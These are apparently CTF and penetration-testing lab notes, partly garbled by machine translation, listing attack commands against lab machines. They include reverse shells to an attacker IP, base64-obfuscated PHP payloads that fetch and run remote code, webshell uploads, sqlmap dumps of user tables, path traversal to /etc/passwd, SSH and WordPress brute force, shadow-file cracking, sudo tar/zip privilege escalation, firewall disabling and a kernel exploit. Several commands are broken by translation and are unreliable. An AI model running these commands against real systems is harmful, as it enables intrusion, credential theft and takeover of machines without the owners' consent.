CTF learning materials

This is ctf learning materials, if desired video and range and other learning materials can be added QQ group 1,031,811,955
single-user mode, press the shif e to ro recovery nomodeset, should replace rw single init = / bin / bash press ctr + x passwd root
scan LAN ip, mac mapping relationship
netdiscover -r 192.168.1.1/24

Lift the occupied ports
netstat -pantu
netstat -lnp | grep 4444
fuser -v -n tcp 4444
the kill -9 2169

PS-A

restart Network Service
/etc/init.d/network restart or /etc/init.d/networking restart

service vsftpd start
/home/uftp

nc -nlvp 4444

Information detect
nmap -sV 192.168.1.3

nmap -T4 -p- 192.168.1.6

nmap -T4 -Is -v 192.168.1.6

no -host http://192.168.1.6

themed http://192.168.1.6

python -c “import pty;pty.spawn(’/bin/bash’)”

ssh [email protected]
mysql -h 192.168.1.11 -u username_here -p

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.8

set username hadi

set threads 5

set pass_file / root / Desktop /common-password/hadi.txt

set verbose true

python -c “import pty;pty.spawn(’/bin/bash’)”

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” --tables

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” --columns

sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” -C “login,password” --dump

http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php

netdiscover -r 192.168.1.1/24

clear

playsms/index.php?app=main&inc=feature_sendfromfile&op=list

<?php system('uname -a');die(); ?>.php

https://www.expolit-db.com/exipolits/42003
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==

<?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg=='));die(); ?>.php <?php system(base64_decode('Y2htb2QgNzc3IC90bXAvYQo='));die(); ?>.php <?php system(base64_decode('L3RtcC9hCg=='));die(); ?>.php

sudo perl -e "exec ’ /bin/sh’ "
bash -i

shellcd.PHP

apt-get install avws

sqlmap -u “http://192.168.1.9” --headers=“X-Forwarded-For:*” --dbs --batch

sqlmap -u url --headers=“X-Forwarded-For:*” --dbs --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog --tables --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users --columns --batch

sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users -C login,password --dump --batch

cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/

msfvenom -p python / meterpreter / reverse_tcp lhost = 192.168.1.10 lport = 4444 -f raw> / root / Desktop /shell.py

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

service apache2 start
service apache2 status

sysinfo
shell

http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
cat / etc / passwd
knew togie
sudo -l

13.CTF Capture the Flag - directory traversal (www-data users to get permission)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
OWASP -zap
http://192.168.1.8 /view.php?page=...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F... 2Fetc% 2F% ...% 2Fpasswd
cd / usr / report this content share / webshells / PHP
cp PHP-Reverse-shell.php / root / Desktop
mv php-reverse-shell.php shell.php

<?php system("cd /tmp; wget http://192.168.1.10:8000/shell.php; chmod +x shell.php; php shell.php");?>

python -m “SimpleHTTPServer”
nc -nlvp 4444
/usr/databases/shell.php
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fusr/databases/shell.php
python -c “import pty;pty.spawn(’/bin/bash’)”

14.WEB安全暴力破解
http://192.168.1.12/secret/wp-login.php
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
marlinspike
python -c “import pty;pty.spawn(’/bin/bash’)”
su - marlinspike
sudo -l
sudo bash

15. The path traversal (mention the right root privileges) web security provide the right
uname -a
CAT / etc / Issue
CAT / etc / * - Release
CAT / etc / passwd
CAT / etc / Shadow
CAT / etc / crontab
sudo
sudo the -l
cd / Home
CD WordPress
SSH [email protected]
sWfCsfJSPV9H3AmQzw8
Touch exploit
the sudo -u ZIP exploit.zip exploit the root---unzip Comman = -T "-C SH / bin / the bash"
the sudo -u the root the tar CF2 / dev / null exploit - -checkpoint = 1 --checkpoint-action = " / bin / bash"

16.web security command
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp

ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
nc -lvp 444
ssh bill@localhost sudo bash -i>& /dev/tcp/192.168.1.10/444 0>& 1
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
ssh bill@localhost sudo wget “http://192.168.1.10:8000/webshell.jsp” -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
ssh bill@localhost sudo chmod 777 /var/lib/tomcat8/webapps/ROOT/webshell.jsp

17. The command execution (using integrated testing tool)
-Service Network Start
the ifconfig ens33 192.168.1.11
mounted Sparta
Git clone https://github.com/secforce/sparta.git / opt / Sparta
Git clone https://github.com/elixir -lang / elixir.git
APT-GET-install Python Elixir
APT-GET-utils install the LDAP Client the rwho rsh-x11-Apps finger
cd / opt / sparta
./sparta.py

/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev

cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
nc -nlvp 4444
echo ‘bash -i >& /dev/tcp/192.168.1.10/4445 0>&1’ | bash
sudo su

18.PUT upload vulnerability
curl -v -X OPTIONS http://192.168.1.11/test
Firefox installation RESTClient
cp /usr/share/webshells/php/php-reverse-shell.php shell.php

http://192.168.1.3/login.php
@ btrisk.com

23. Integrated Test (difficult kernel privilege escalation) WEB security Intermediate invasion
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u

u --enumerate wpscan http://192.168.1.6/wordpress --url

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php

searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
gcc 41458.c -o shellroot
upload /root/桌面/shellroot
chmod 777 shellroot
./shellroot